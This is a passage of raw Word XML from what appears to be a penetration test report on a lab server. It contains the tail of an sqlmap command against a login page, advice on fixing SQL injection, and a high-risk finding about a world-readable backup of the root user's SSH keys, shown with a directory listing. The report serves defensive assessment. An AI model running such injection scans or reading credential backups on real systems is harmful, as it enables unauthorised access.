      <w:r w:rsidRPr="001330E3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001330E3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u 'http://10.10.0.66:8001/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001330E3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001330E3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3356D2" w14:textId="77777777" w:rsidR="00C566FB" w:rsidRDefault="00C566FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFAC555" w14:textId="7C113BE2" w:rsidR="004956AA" w:rsidRDefault="004956AA" w:rsidP="004956AA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29443A0C" w14:textId="03EB86D5" w:rsidR="00C566FB" w:rsidRDefault="00C566FB" w:rsidP="00C566FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C566FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Input validation and sanitization</w:t>
      </w:r>
      <w:r>
        <w:t>: Input validation and sanitization are crucial to preventing SQL injection attacks. All user inputs should be validated and sanitized to prevent the injection of malicious code into SQL statements. This can be done using a whitelist or blacklist approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C7DCB" w14:textId="7F53F599" w:rsidR="00C566FB" w:rsidRDefault="00C566FB" w:rsidP="00C566FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C566FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use of prepared statements or parameterized queries:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> One of the most effective ways to prevent SQL injection is to use prepared statements or parameterized queries when interacting with the database. This can help ensure that the SQL statement is pre-compiled and only allows for predefined parameters, making it difficult for attackers to inject malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58256C54" w14:textId="48829C27" w:rsidR="00C566FB" w:rsidRPr="001330E3" w:rsidRDefault="00C566FB" w:rsidP="00C566FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C566FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Principle of Least Privilege:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Following the principle of least privilege is also important for preventing SQL injection attacks. Applications should only be given the necessary permissions to perform their intended functions and not more. This can help limit the impact of an attack by reducing the amount of data that the attacker would have access to in the event of a successful SQL injection attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05711CC8" w14:textId="77777777" w:rsidR="004956AA" w:rsidRDefault="004956AA" w:rsidP="004956AA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Additional Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ECF6C4" w14:textId="36689C9A" w:rsidR="001330E3" w:rsidRDefault="001330E3" w:rsidP="001330E3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22364548" w14:textId="55049E92" w:rsidR="001330E3" w:rsidRDefault="001330E3" w:rsidP="001330E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://sqlmap.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BC518B" w14:textId="50B344C8" w:rsidR="001330E3" w:rsidRDefault="001330E3" w:rsidP="001330E3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – What is SQL Injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FF40A5" w14:textId="522C22A6" w:rsidR="001330E3" w:rsidRDefault="001330E3" w:rsidP="001330E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/sql-injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48837427" w14:textId="14E4BDB1" w:rsidR="001330E3" w:rsidRDefault="001330E3" w:rsidP="001330E3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP – SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A65BAE" w14:textId="4710AF81" w:rsidR="001330E3" w:rsidRPr="001330E3" w:rsidRDefault="001330E3" w:rsidP="001330E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/SQL_Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC43A0A" w14:textId="77777777" w:rsidR="004956AA" w:rsidRDefault="004956AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DB7078" w14:textId="5EDCF875" w:rsidR="00055045" w:rsidRPr="00542A1D" w:rsidRDefault="00055045" w:rsidP="00055045">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00542A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Risk Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7176606A" w14:textId="316F5FEB" w:rsidR="00055045" w:rsidRPr="001215EC" w:rsidRDefault="00055045" w:rsidP="00055045">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Information Disclosure – Backup File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655DC4E2" w14:textId="77777777" w:rsidR="00055045" w:rsidRPr="006F5E52" w:rsidRDefault="00055045" w:rsidP="00055045">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055045" w:rsidRPr="005264D0" w14:paraId="76F6CA99"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956EE0A" w14:textId="600E01D3" w:rsidR="00055045" w:rsidRPr="005264D0" w:rsidRDefault="00D36E2B" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D36E2B">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Information Disclosure – Backup File</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00055045" w:rsidRPr="005264D0" w14:paraId="505FFA42" w14:textId="77777777" w:rsidTr="0005504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74C74F08" w14:textId="617F9ECC" w:rsidR="00055045" w:rsidRPr="00DA733E" w:rsidRDefault="00055045"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1D2FE510" w14:textId="77777777" w:rsidR="00055045" w:rsidRPr="005264D0" w:rsidRDefault="00055045" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFAFAF"/>
          </w:tcPr>
          <w:p w14:paraId="517353BA" w14:textId="13982CFE" w:rsidR="00055045" w:rsidRPr="005264D0" w:rsidRDefault="00055045" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00055045" w:rsidRPr="005264D0" w14:paraId="5A4701B9" w14:textId="77777777" w:rsidTr="0005504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0D10A134" w14:textId="77777777" w:rsidR="00055045" w:rsidRPr="005264D0" w:rsidRDefault="00055045" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5204F898" w14:textId="77777777" w:rsidR="00055045" w:rsidRPr="005264D0" w:rsidRDefault="00055045" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23C1BB9B" w14:textId="4E4FC351" w:rsidR="00055045" w:rsidRPr="005264D0" w:rsidRDefault="00055045" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00055045">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00055045">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00055045">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7119FCEE" w14:textId="18524B08" w:rsidR="00055045" w:rsidRPr="00DA733E" w:rsidRDefault="00055045" w:rsidP="00055045">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidR="00B2426F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B2426F" w:rsidRPr="00B2426F">
        <w:t>This type of vulnerability typically occurs when backup files are stored in a location that is accessible by users who do not have the proper permissions or access controls in place. Attackers can exploit this vulnerability by gaining access to the backup file and extracting sensitive data or information, such as user credentials, personal identifying information, or intellectual property. This can be particularly damaging if the backup file contains data that is critical to the organization's operations or that is subject to regulatory compliance requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0937CA" w14:textId="77777777" w:rsidR="00055045" w:rsidRDefault="00055045" w:rsidP="00055045">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Locations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AE07A4" w14:textId="6FC1B200" w:rsidR="00055045" w:rsidRPr="003C17E2" w:rsidRDefault="00055045" w:rsidP="00055045">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7067EE73" w14:textId="0E8A48A9" w:rsidR="00055045" w:rsidRPr="003C17E2" w:rsidRDefault="00B51413" w:rsidP="00055045">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B51413">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>.backup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00055045" w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08413D87" w14:textId="77777777" w:rsidR="00055045" w:rsidRDefault="00055045" w:rsidP="00055045">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49E21652" w14:textId="77777777" w:rsidR="00055045" w:rsidRPr="006F5E52" w:rsidRDefault="00055045" w:rsidP="00055045">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D195F4" w14:textId="11C723A3" w:rsidR="00055045" w:rsidRDefault="00055045" w:rsidP="00055045">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00B51413">
        <w:t xml:space="preserve">e application server </w:t>
      </w:r>
      <w:r w:rsidR="004E111C">
        <w:t xml:space="preserve">has a backup file containing SSH keys for the </w:t>
      </w:r>
      <w:r w:rsidR="004E111C" w:rsidRPr="004E111C">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidR="004E111C">
        <w:t>user. This file can be read by other users on the server, as shown in the following figure of the permissions information.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00055045" w14:paraId="09AC46D0" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="26D5A84E" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gibson@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nbnserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:~</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>$ ls -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>latr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> /.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root.backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DA688BB" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>total 12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D86A51" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>drwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-x 24 root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4096 Apr </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>21  2019</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ..</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11736CFC" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>drwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>x  3</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4096 Apr 21  2019 .</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A729AE0" w14:textId="1428C4EF" w:rsidR="00055045" w:rsidRPr="004E111C" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>drwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
